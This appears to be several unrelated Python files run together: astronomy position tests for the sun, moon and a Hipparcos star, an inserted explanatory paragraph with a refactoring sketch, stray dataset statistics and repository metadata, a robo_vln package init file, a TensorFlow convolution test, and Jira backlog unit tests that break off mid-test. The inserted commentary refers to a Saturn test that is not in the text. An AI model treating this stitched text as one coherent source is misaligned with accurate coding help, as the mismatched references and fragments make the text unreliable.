def test_sun_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.sun).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 8.02959789881544, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.496678572125123, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 8.000015838288707, 0.001 * ra_arcsecond)
compare(dec.degrees, 20.584000539289498, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 46.72403357148823, 0.001 * arcsecond)
compare(az.degrees, 258.5550717845957, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 46.73947196634687, 0.001 * arcsecond)
compare(az.degrees, 258.5550717845957, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 46.73962875307724, 0.001 * arcsecond)
compare(az.degrees, 258.5550717845957, 0.001 * arcsecond)
def test_sun_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.sun).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 3.7755906381611175, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.90505409109931, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 3.7664985705990794, 0.001 * ra_arcsecond)
compare(dec.degrees, 19.87762515818775, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 2.2209469369832533, 0.001 * arcsecond)
compare(az.degrees, 293.95636637272145, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 2.4868409787793837, 0.001 * arcsecond)
compare(az.degrees, 293.95636637272145, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 2.489379891081029, 0.001 * arcsecond)
compare(az.degrees, 293.95636637272145, 0.001 * arcsecond)
def test_sun_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.sun).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 18.752264357691004, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.03532101826747, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 18.751976099155204, 0.001 * ra_arcsecond)
compare(dec.degrees, -23.03404957045815, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -5.486505415022805, 0.001 * arcsecond)
compare(az.degrees, 115.32008451470392, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -5.486505415022805, 0.001 * arcsecond)
compare(az.degrees, 115.32008451470392, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -5.486505415022805, 0.001 * arcsecond)
compare(az.degrees, 115.32008451470392, 0.001 * arcsecond)
def test_sun_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.sun).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 10.267679924967121, 0.001 * ra_arcsecond)
compare(dec.degrees, 10.752399537108259, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 10.279138748598198, 0.001 * ra_arcsecond)
compare(dec.degrees, 10.686961444410377, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -2.738407691502772, 0.001 * arcsecond)
compare(az.degrees, 286.09632001391725, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -2.738407691502772, 0.001 * arcsecond)
compare(az.degrees, 286.09632001391725, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -2.738407691502772, 0.001 * arcsecond)
compare(az.degrees, 286.09632001391725, 0.001 * arcsecond)
def test_sun_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.sun).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (8.02959789881544, 3.7755906381611175, 18.752264357691004, 10.267679924967121), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.496678572125123, 19.90505409109931, -23.03532101826747, 10.752399537108259), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (8.000015838288707, 3.7664985705990794, 18.751976099155204, 10.279138748598198), 0.001 * ra_arcsecond)
compare(dec.degrees, (20.584000539289498, 19.87762515818775, -23.03404957045815, 10.686961444410377), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (46.72403357148823, 2.2209469369832533, -5.486505415022805, -2.738407691502772), 0.001 * arcsecond)
compare(az.degrees, (258.5550717845957, 293.95636637272145, 115.32008451470392, 286.09632001391725), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (46.73947196634687, 2.4868409787793837, -5.486505415022805, -2.738407691502772), 0.001 * arcsecond)
compare(az.degrees, (258.5550717845957, 293.95636637272145, 115.32008451470392, 286.09632001391725), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (46.73962875307724, 2.489379891081029, -5.486505415022805, -2.738407691502772), 0.001 * arcsecond)
compare(az.degrees, (258.5550717845957, 293.95636637272145, 115.32008451470392, 286.09632001391725), 0.001 * arcsecond)
def test_moon_topocentric_date0():
jd = JulianDate(tt=2440423.345833333)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.moon).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 12.489955349304845, 0.001 * ra_arcsecond)
compare(dec.degrees, -5.189705732227236, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 12.463855411284248, 0.001 * ra_arcsecond)
compare(dec.degrees, -5.022075882872161, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 41.92040135025528, 0.001 * arcsecond)
compare(az.degrees, 151.19707488767745, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 41.938650930940234, 0.001 * arcsecond)
compare(az.degrees, 151.19707488767745, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 41.938836248377605, 0.001 * arcsecond)
compare(az.degrees, 151.19707488767745, 0.001 * arcsecond)
def test_moon_topocentric_date1():
jd = JulianDate(tt=2448031.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.moon).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 23.663473338211578, 0.001 * ra_arcsecond)
compare(dec.degrees, 1.227161288913488, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 23.655459675858083, 0.001 * ra_arcsecond)
compare(dec.degrees, 1.1749464194383863, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, -47.74510120858602, 0.001 * arcsecond)
compare(az.degrees, 338.13295291812307, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, -47.74510120858602, 0.001 * arcsecond)
compare(az.degrees, 338.13295291812307, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, -47.74510120858602, 0.001 * arcsecond)
compare(az.degrees, 338.13295291812307, 0.001 * arcsecond)
def test_moon_topocentric_date2():
jd = JulianDate(tt=2451545.0)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.moon).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 14.845679251156893, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.590214641232205, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 14.845444624832663, 0.001 * ra_arcsecond)
compare(dec.degrees, -11.58799188846256, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 36.381265580736255, 0.001 * arcsecond)
compare(az.degrees, 156.2971102404744, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 36.40348032108563, 0.001 * arcsecond)
compare(az.degrees, 156.2971102404744, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 36.403705864717445, 0.001 * arcsecond)
compare(az.degrees, 156.2971102404744, 0.001 * arcsecond)
def test_moon_topocentric_date3():
jd = JulianDate(tt=2456164.5)
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.moon).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, 16.380804513901573, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.79048462924397, 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, 16.393647715389825, 0.001 * ra_arcsecond)
compare(dec.degrees, -21.81897641768761, 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, 28.439387966372543, 0.001 * arcsecond)
compare(az.degrees, 191.29497427201525, 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, 28.46951344291743, 0.001 * arcsecond)
compare(az.degrees, 191.29497427201525, 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, 28.46981916998486, 0.001 * arcsecond)
compare(az.degrees, 191.29497427201525, 0.001 * arcsecond)
def test_moon_topocentric_date4():
jd = JulianDate(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5])
usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
apparent = usno(jd).observe(de405.moon).apparent()
ra, dec, distance = apparent.radec()
compare(ra.hours, (12.489955349304845, 23.663473338211578, 14.845679251156893, 16.380804513901573), 0.001 * ra_arcsecond)
compare(dec.degrees, (-5.189705732227236, 1.227161288913488, -11.590214641232205, -21.79048462924397), 0.001 * arcsecond)
ra, dec, distance = apparent.radec(epoch='date')
compare(ra.hours, (12.463855411284248, 23.655459675858083, 14.845444624832663, 16.393647715389825), 0.001 * ra_arcsecond)
compare(dec.degrees, (-5.022075882872161, 1.1749464194383863, -11.58799188846256, -21.81897641768761), 0.001 * arcsecond)
alt, az, distance = apparent.altaz()
compare(alt.degrees, (41.92040135025528, -47.74510120858602, 36.381265580736255, 28.439387966372543), 0.001 * arcsecond)
compare(az.degrees, (151.19707488767745, 338.13295291812307, 156.2971102404744, 191.29497427201525), 0.001 * arcsecond)
alt, az, distance = apparent.altaz('standard')
compare(alt.degrees, (41.938650930940234, -47.74510120858602, 36.40348032108563, 28.46951344291743), 0.001 * arcsecond)
compare(az.degrees, (151.19707488767745, 338.13295291812307, 156.2971102404744, 191.29497427201525), 0.001 * arcsecond)
alt, az, distance = apparent.altaz(10.0, 1010.0)
compare(alt.degrees, (41.938836248377605, -47.74510120858602, 36.403705864717445, 28.46981916998486), 0.001 * arcsecond)
compare(az.degrees, (151.19707488767745, 338.13295291812307, 156.2971102404744, 191.29497427201525), 0.001 * arcsecond)
def test_hipparcos_conversion0():
line = 'H| 11767| |02 31 47.08|+89 15 50.9| 1.97|1|H|037.94614689|+89.26413805| | 7.56| 44.22| -11.74| 0.39| 0.45| 0.48| 0.47| 0.55|-0.16| 0.05| 0.27|-0.01| 0.08| 0.05| 0.04|-0.12|-0.09|-0.36| 1| 1.22| 11767| 2.756|0.003| 2.067|0.003| | 0.636|0.003|T|0.70|0.00|L| | 2.1077|0.0021|0.014|102| | 2.09| 2.13| 3.97|P|1|A|02319+8915|I| 1| 1| | | | | | | | | |S| |P| 8890|B+88 8 | | |0.68|F7:Ib-IIv SB|G\n'
star = hipparcos.parse(line)
compare(star.ra.hours, 2.530301023497941, 0.001 * ra_arcsecond)
compare(star.dec.degrees, 89.26410950742938, 0.001 * arcsecond)
ra, dec, distance = de405.earth(tt=2440423.345833333).observe(star).radec()
compare(ra.hours, 2.5283697000528966, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26420852419295, 0.001 * arcsecond)
def test_hipparcos_conversion1():
line = 'H| 11767| |02 31 47.08|+89 15 50.9| 1.97|1|H|037.94614689|+89.26413805| | 7.56| 44.22| -11.74| 0.39| 0.45| 0.48| 0.47| 0.55|-0.16| 0.05| 0.27|-0.01| 0.08| 0.05| 0.04|-0.12|-0.09|-0.36| 1| 1.22| 11767| 2.756|0.003| 2.067|0.003| | 0.636|0.003|T|0.70|0.00|L| | 2.1077|0.0021|0.014|102| | 2.09| 2.13| 3.97|P|1|A|02319+8915|I| 1| 1| | | | | | | | | |S| |P| 8890|B+88 8 | | |0.68|F7:Ib-IIv SB|G\n'
star = hipparcos.parse(line)
compare(star.ra.hours, 2.530301023497941, 0.001 * ra_arcsecond)
compare(star.dec.degrees, 89.26410950742938, 0.001 * arcsecond)
ra, dec, distance = de405.earth(tt=2448031.5).observe(star).radec()
compare(ra.hours, 2.529691010447949, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26413900274704, 0.001 * arcsecond)
def test_hipparcos_conversion2():
line = 'H| 11767| |02 31 47.08|+89 15 50.9| 1.97|1|H|037.94614689|+89.26413805| | 7.56| 44.22| -11.74| 0.39| 0.45| 0.48| 0.47| 0.55|-0.16| 0.05| 0.27|-0.01| 0.08| 0.05| 0.04|-0.12|-0.09|-0.36| 1| 1.22| 11767| 2.756|0.003| 2.067|0.003| | 0.636|0.003|T|0.70|0.00|L| | 2.1077|0.0021|0.014|102| | 2.09| 2.13| 3.97|P|1|A|02319+8915|I| 1| 1| | | | | | | | | |S| |P| 8890|B+88 8 | | |0.68|F7:Ib-IIv SB|G\n'
star = hipparcos.parse(line)
compare(star.ra.hours, 2.530301023497941, 0.001 * ra_arcsecond)
compare(star.dec.degrees, 89.26410950742938, 0.001 * arcsecond)
ra, dec, distance = de405.earth(tt=2451545.0).observe(star).radec()
compare(ra.hours, 2.5302921836971946, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26411033462212, 0.001 * arcsecond)
def test_hipparcos_conversion3():
line = 'H| 11767| |02 31 47.08|+89 15 50.9| 1.97|1|H|037.94614689|+89.26413805| | 7.56| 44.22| -11.74| 0.39| 0.45| 0.48| 0.47| 0.55|-0.16| 0.05| 0.27|-0.01| 0.08| 0.05| 0.04|-0.12|-0.09|-0.36| 1| 1.22| 11767| 2.756|0.003| 2.067|0.003| | 0.636|0.003|T|0.70|0.00|L| | 2.1077|0.0021|0.014|102| | 2.09| 2.13| 3.97|P|1|A|02319+8915|I| 1| 1| | | | | | | | | |S| |P| 8890|B+88 8 | | |0.68|F7:Ib-IIv SB|G\n'
star = hipparcos.parse(line)
compare(star.ra.hours, 2.530301023497941, 0.001 * ra_arcsecond)
compare(star.dec.degrees, 89.26410950742938, 0.001 * arcsecond)
ra, dec, distance = de405.earth(tt=2456164.5).observe(star).radec()
compare(ra.hours, 2.5311170753257395, 0.001 * ra_arcsecond)
compare(dec.degrees, 89.26406913848278, 0.001 * arcsecond)
def test_hipparcos_conversion4():
line = 'H| 11767| |02 31 47.08|+89 15 50.9| 1.97|1|H|037.94614689|+89.26413805| | 7.56| 44.22| -11.74| 0.39| 0.45| 0.48| 0.47| 0.55|-0.16| 0.05| 0.27|-0.01| 0.08| 0.05| 0.04|-0.12|-0.09|-0.36| 1| 1.22| 11767| 2.756|0.003| 2.067|0.003| | 0.636|0.003|T|0.70|0.00|L| | 2.1077|0.0021|0.014|102| | 2.09| 2.13| 3.97|P|1|A|02319+8915|I| 1| 1| | | | | | | | | |S| |P| 8890|B+88 8 | | |0.68|F7:Ib-IIv SB|G\n'
star = hipparcos.parse(line)
compare(star.ra.hours, 2.530301023497941, 0.001 * ra_arcsecond)
compare(star.dec.degrees, 89.26410950742938, 0.001 * arcsecond)
ra, dec, distance = de405.earth(tt=[2440423.345833333, 2448031.5, 2451545.0, 2456164.5]).observe(star).radec()
compare(ra.hours, (2.5283697000528966, 2.529691010447949, 2.5302921836971946, 2.5311170753257395), 0.001 * ra_arcsecond)
compare(dec.degrees, (89.26420852419295, 89.26413900274704, 89.26411033462212, 89.26406913848278), 0.001 * arcsecond)
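Every topocentric test above repeats the same chain: build a JulianDate, observe the target from the USNO topos, and compare astrometric radec, date-epoch radec, and three altaz variants against reference values. The helper below is a minimal sketch of how that shared pattern could be factored out; it assumes the same de405, JulianDate, compare, arcsecond, and ra_arcsecond objects the tests above already use, and the expected-value dictionary keys are hypothetical names chosen here for illustration.

# Minimal sketch: factor the repeated topocentric comparison pattern into one
# helper. Assumes de405, JulianDate, compare, arcsecond and ra_arcsecond are
# the same objects the individual tests above rely on.
def check_topocentric(target, tt, expected):
    """Run the radec/altaz comparison chain used by the tests above.

    `expected` maps 'radec', 'radec_date', 'altaz', 'altaz_standard' and
    'altaz_10_1010' to (first, second) reference tuples.
    """
    jd = JulianDate(tt=tt)
    usno = de405.earth.topos('38.9215 N', '77.0669 W', elevation_m=92.0)
    apparent = usno(jd).observe(target).apparent()

    ra, dec, _ = apparent.radec()
    compare(ra.hours, expected['radec'][0], 0.001 * ra_arcsecond)
    compare(dec.degrees, expected['radec'][1], 0.001 * arcsecond)

    ra, dec, _ = apparent.radec(epoch='date')
    compare(ra.hours, expected['radec_date'][0], 0.001 * ra_arcsecond)
    compare(dec.degrees, expected['radec_date'][1], 0.001 * arcsecond)

    for key, args in (('altaz', ()),
                      ('altaz_standard', ('standard',)),
                      ('altaz_10_1010', (10.0, 1010.0))):
        alt, az, _ = apparent.altaz(*args)
        compare(alt.degrees, expected[key][0], 0.001 * arcsecond)
        compare(az.degrees, expected[key][1], 0.001 * arcsecond)

With such a helper, a test like test_saturn_topocentric_date1 above reduces to a single call passing de405.saturn, 2448031.5, and the reference tuples it lists.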
| 46.212027
| 464
| 0.707296
| 17,884
| 134,477
| 5.24754
| 0.0638
| 0.037082
| 0.081867
| 0.077019
| 0.856373
| 0.839665
| 0.827506
| 0.79164
| 0.74127
| 0.64944
| 0
| 0.322831
| 0.151714
| 134,477
| 2,909
| 465
| 46.227913
| 0.499847
| 0.001138
| 0
| 0.522381
| 1
| 0.002238
| 0.032169
| 0.005075
| 0
| 0
| 0
| 0.000344
| 0.000895
| 1
| 0.091764
| false
| 0
| 0.003581
| 0
| 0.095345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
545ccb260f2ff919d32c1e8332d29c4969193170
| 151
|
py
|
Python
|
robo_vln_baselines/__init__.py
|
Felix2048/robo-vln
|
a9fbc6935e75fc0b3c9435a3f2a219ca4d19ef21
|
[
"MIT"
] | 38
|
2021-04-22T03:25:50.000Z
|
2022-03-31T14:21:36.000Z
|
robo_vln_baselines/__init__.py
|
Felix2048/robo-vln
|
a9fbc6935e75fc0b3c9435a3f2a219ca4d19ef21
|
[
"MIT"
] | 5
|
2021-06-02T03:29:13.000Z
|
2021-09-23T00:04:08.000Z
|
robo_vln_baselines/__init__.py
|
Felix2048/robo-vln
|
a9fbc6935e75fc0b3c9435a3f2a219ca4d19ef21
|
[
"MIT"
] | 5
|
2021-04-21T12:49:43.000Z
|
2021-07-29T02:43:37.000Z
|
from robo_vln_baselines import robo_vln_trainer
from robo_vln_baselines import hierarchical_trainer
from robo_vln_baselines.common import environments
| 37.75
| 51
| 0.913907
| 22
| 151
| 5.863636
| 0.409091
| 0.217054
| 0.255814
| 0.465116
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07947
| 151
| 3
| 52
| 50.333333
| 0.928058
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
547d8fe6b268992f1163594887b48eeb222900c5
| 766
|
py
|
Python
|
test/play_with_conv2d_transpose.py
|
brianlan/image-semantic-segmentation
|
aef172ed022091b9151f3eef1cc6213bbb122635
|
[
"MIT"
] | 3
|
2017-09-14T16:19:46.000Z
|
2018-02-28T12:51:31.000Z
|
test/play_with_conv2d_transpose.py
|
brianlan/image-semantic-segmentation
|
aef172ed022091b9151f3eef1cc6213bbb122635
|
[
"MIT"
] | 1
|
2017-09-14T16:20:14.000Z
|
2017-09-14T16:20:14.000Z
|
test/play_with_conv2d_transpose.py
|
brianlan/kaggle-carvana-semantic-segmentation-unet
|
aef172ed022091b9151f3eef1cc6213bbb122635
|
[
"MIT"
] | null | null | null |
import tensorflow as tf


def test_conv2d():
    tf.set_random_seed(1)
    x = tf.random_normal(shape=[1, 5, 5, 3])
    kernel = tf.random_normal(shape=[2, 2, 3, 1])
    # Forward convolution: SAME padding with stride 1 keeps the 5x5 spatial size.
    y = tf.nn.conv2d(x, kernel, strides=[1, 1, 1, 1], padding="SAME")
    sess = tf.Session()
    tf.global_variables_initializer().run(session=sess)
    a = y.eval(session=sess)
    pass


def test_conv2d_transpose():
    tf.set_random_seed(1)
    x = tf.random_normal(shape=[1, 3, 3, 1])
    kernel = tf.random_normal(shape=[2, 2, 3, 1])
    # Transposed convolution: stride 2 upsamples the 3x3 input to the
    # requested 5x5x3 output.
    y = tf.nn.conv2d_transpose(x, kernel, output_shape=[1, 5, 5, 3],
                               strides=[1, 2, 2, 1], padding="SAME")
    sess = tf.Session()
    tf.global_variables_initializer().run(session=sess)
    a = y.eval(session=sess)
    pass
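The transposed-convolution test asks for an explicit output_shape of [1, 5, 5, 3] from a 3x3 input with stride 2 and SAME padding. As far as I understand the op, that shape is accepted because a forward SAME-padded convolution of a 5x5 (or 6x6) input at stride 2 collapses back to 3x3; the small pure-Python sketch below (no TensorFlow needed) spells out that consistency rule.

import math

def same_conv_output_size(size, stride):
    # Output length of a SAME-padded convolution: ceil(size / stride).
    return math.ceil(size / stride)

def transpose_shape_is_valid(input_size, output_size, stride):
    # conv2d_transpose accepts an explicit output_shape only if running the
    # forward convolution on it would reproduce the input size.
    return same_conv_output_size(output_size, stride) == input_size

# 5x5 collapses to 3x3 under stride 2, so output_shape=[1, 5, 5, 3] is valid
# for the 1x3x3x1 input above; a 6x6 output would also be accepted.
assert transpose_shape_is_valid(3, 5, 2)
assert transpose_shape_is_valid(3, 6, 2)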
| 26.413793
| 69
| 0.608355
| 122
| 766
| 3.680328
| 0.278689
| 0.071269
| 0.124722
| 0.169265
| 0.761693
| 0.734967
| 0.734967
| 0.734967
| 0.734967
| 0.734967
| 0
| 0.05753
| 0.22846
| 766
| 28
| 70
| 27.357143
| 0.7022
| 0
| 0
| 0.6
| 0
| 0
| 0.010444
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0.1
| 0.05
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
54a35666406b58ef10bf29928ed99b6a57c5d48e
| 19,579
|
py
|
Python
|
backend/tests/unittests/metric_source/jira_backlog_tests.py
|
ICTU/quality-report
|
f6234e112228ee7cfe6476c2d709fe244579bcfe
|
[
"Apache-2.0"
] | 25
|
2016-11-25T10:41:24.000Z
|
2021-07-03T14:02:49.000Z
|
backend/tests/unittests/metric_source/jira_backlog_tests.py
|
ICTU/quality-report
|
f6234e112228ee7cfe6476c2d709fe244579bcfe
|
[
"Apache-2.0"
] | 783
|
2016-09-19T12:10:21.000Z
|
2021-01-04T20:39:15.000Z
|
backend/tests/unittests/metric_source/jira_backlog_tests.py
|
ICTU/quality-report
|
f6234e112228ee7cfe6476c2d709fe244579bcfe
|
[
"Apache-2.0"
] | 15
|
2015-03-25T13:52:49.000Z
|
2021-03-08T17:17:56.000Z
|
"""
Copyright 2012-2018 Ministerie van Sociale Zaken en Werkgelegenheid
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import datetime
import unittest
from unittest.mock import patch, call
from hqlib.metric_source import JiraFilter, Jira
from hqlib.metric_source.jira_backlog import JiraBacklog, JQL_CONFIG
@patch.object(Jira, 'get_field_id')
@patch.object(Jira, 'get_query')
class JiraBacklogWithLtcsTests(unittest.TestCase):
""" Unit tests for """
def test_nr_user_stories_with_sufficient_ltcs(self, mock_get_query, mock_get_field_id):
""" Tests that the function invokes correct default jql query. """
mock_get_query.return_value = {"issues": [{"fields": {"custom_123": 1, "issuelinks": [{"id": "1"}]}}]}
mock_get_field_id.return_value = 'custom_123'
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'custom_field_name')
result = backlog.nr_user_stories_with_sufficient_ltcs()
self.assertEqual((1, [{"fields": {"custom_123": 1, "issuelinks": [{"id": "1"}]}}]), result)
mock_get_field_id.assert_called_once_with('custom_field_name')
def test_nr_user_stories_with_sufficient_ltcs_multi(self, mock_get_query, mock_get_field_id):
""" Tests that the function invokes correct default jql query. """
mock_get_query.side_effect = [{"issues": [{"fields": {"custom_123": 1, "issuelinks": [{"id": "1"}]}}]},
{"issues": [{"fields": {"custom_123": 1, "issuelinks": [{"id": "2"}]}}]}]
mock_get_field_id.return_value = 'custom_123'
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'custom_field_name',
jql_config={"nr_user_stories_with_sufficient_ltcs": ['1st {project}', '2nd {project}']})
result = backlog.nr_user_stories_with_sufficient_ltcs()
self.assertEqual((2, [{"fields": {"custom_123": 1, "issuelinks": [{"id": "1"}]}},
{"fields": {"custom_123": 1, "issuelinks": [{"id": "2"}]}}]), result)
mock_get_field_id.assert_called_once_with('custom_field_name')
self.assertEqual([call('1st project!'), call('2nd project!')], mock_get_query.call_args_list)
def test_nr_user_stories_with_sufficient_ltcs_error(self, mock_get_query, mock_get_field_id):
""" Tests that the function invokes correct default jql query. """
mock_get_field_id.return_value = None
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'custom_field_name')
result = backlog.nr_user_stories_with_sufficient_ltcs()
self.assertEqual((-1, []), result)
mock_get_field_id.assert_called_once_with('custom_field_name')
mock_get_query.assert_not_called()
@patch.object(logging, 'error')
def test_nr_user_stories_with_sufficient_ltcs_field(self, mock_error, mock_get_query, mock_get_field_id):
""" Tests that the function invokes correct default jql query. """
mock_get_query.return_value = {"issues": [{"fields": {"issuelinks": [{"id": "1"}]}}]}
mock_get_field_id.return_value = 'missing_custom_field'
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'custom_field_name')
result = backlog.nr_user_stories_with_sufficient_ltcs()
self.assertEqual((-1, []), result)
mock_get_field_id.assert_called_once_with('custom_field_name')
self.assertEqual('Error processing jira response. The key %s not found!', mock_error.call_args_list[0][0][0])
self.assertIsInstance(mock_error.call_args_list[0][0][1], KeyError)
@patch.object(JiraFilter, 'nr_issues')
class JiraBacklogTests(unittest.TestCase):
""" Unit tests of the constructor of the Jira class. """
# pylint: disable=too-many-public-methods
@patch.object(JiraFilter, '__init__')
def test_init(self, mock_init, mock_nr_issues):
""" Tests that the inner JiraFilter is initialized with correct parameters """
mock_init.return_value = None
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
backlog.nr_user_stories()
mock_nr_issues.assert_called_once()
mock_init.assert_called_once_with('url!', 'username!', 'password!')
self.assertEqual('Jira backlog', backlog.metric_source_name)
def test_nr_user_stories(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.nr_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('project = "project!" AND type = Story')
def test_nr_user_stories_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"nr_user_stories": ['1st {project}', '2nd {project}']})
result = backlog.nr_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_nr_user_stories_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"nr_user_stories": [11, '12']})
result = backlog.nr_user_stories()
self.assertEqual((1, ['a']), result)
